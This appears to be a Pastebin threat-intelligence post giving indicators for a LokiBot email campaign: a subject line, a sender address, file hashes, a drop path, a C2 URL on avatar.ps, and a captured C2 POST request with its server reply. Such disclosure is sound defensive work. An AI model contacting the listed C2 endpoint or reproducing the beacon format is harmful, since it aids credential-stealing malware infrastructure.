Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- THREAT IDENTIFICATION: LOKIBOT
- SUBJECTS OBSERVED
- Richiesta di quotazione
- SENDERS OBSERVED
- caterina.ciambrone@alteaenergia.com
- MALDOC FILE HASHES
- Richiesta di quotazione.gz
- 6ea1f325962183bb76eb910bba5d8083
- LOKIBOT PAYLOAD FILE HASHES
- ConsoleApp2.exe
- 329693bf1fce73c334b98dedce191db1
- Renamed and copied to Appdta\Roaming\17E4D9
- 97071E.exe
- 329693bf1fce73c334b98dedce191db1
- LOKIBOT C2
- http://avatar.ps/modules/five/fre.php
- C2 PACKET CONTENTS
- LOKIBOT C2 PACKET
- POST /modules/five/fre.php HTTP/1.0
- User-Agent: Mozilla/4.08 (Charon; Inferno)
- Host: avatar.ps
- Accept: */*
- Content-Type: application/octet-stream
- Content-Encoding: binary
- Content-Key: DA6FF4FE
- Content-Length: 149
- Connection: close
- HTTP/1.1 200 OK
- Date: Thu, 12 Aug 2021 20:54:09 GMT
- Server: Apache
- Upgrade: h2,h2c
- Connection: Upgrade, close
- Content-Length: 23
- Content-Type: text/html; charset=UTF-8
- ........File not found.
- SUPPORTING EVIDENCE
- https://www.virustotal.com/gui/file/9b83e59783b63981f9f85b2939e038531deb96457d91d5d8debc93f396a15272/detection
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement